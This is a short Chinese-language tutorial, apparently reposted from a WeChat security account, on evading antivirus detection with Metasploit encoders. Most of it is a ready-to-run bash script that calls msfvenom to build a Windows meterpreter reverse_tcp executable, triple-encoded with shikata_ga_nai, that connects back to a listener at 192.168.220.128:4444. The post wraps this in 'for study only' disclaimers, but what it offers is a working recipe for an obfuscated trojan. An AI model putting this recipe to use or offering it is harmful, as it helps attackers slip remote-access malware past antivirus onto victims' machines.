声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!
一、前言
前面说了木马的捆绑,dll,exe,hta等密码,但是木马落地就容易被杀软检测直接隔离了,本章节主要讲我们要怎么对木马进行一个简单的混淆,进行一个简单的免杀。
二、免杀的原理
免杀的原理就是混淆,加密把木马的代码改的杀软检测不出特征,但是计算机又能执行,骗过杀毒软件,就算是免杀成功了。那么msf这个工具当中呢有大量的混淆加密的模块供攻击者去使用,可能这些模块现在过杀毒的效果很差(因为杀软厂家的针对)但是聊胜于无吧,主要给师傅们起到一个学习思路的作用。
三、混淆器参数
1、查看所有混淆器、
msfvenom -l encoder
2、生成混淆后的木马文件
vim msf_ha.sh
chmod +X msf_ha.sh
./msf_ha.sh
ip=192.168.220.128 #ip地址
port=4444 #端口
arch=x86 #系统框架
platform=windows #操作系统
format=exe #格式后缀
encoder=x86/shikata_ga_nai #调用的混淆模块
i=3 #混淆次数
payload=windows/meterpreter/reverse_tcp
# use exploit/multi/handler
out=~/Desktop/msf/hx.exe
# 创建目录
mkdir -p "$(dirname "$out")"
msfvenom -p $payload LHOST=$ip LPORT=$port -f $format -e $encoder -i $i -a $arch --platform $platform -o $out
原文始发于微信公众号(泷羽SEC-ohh):MSF(3)免杀混淆
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论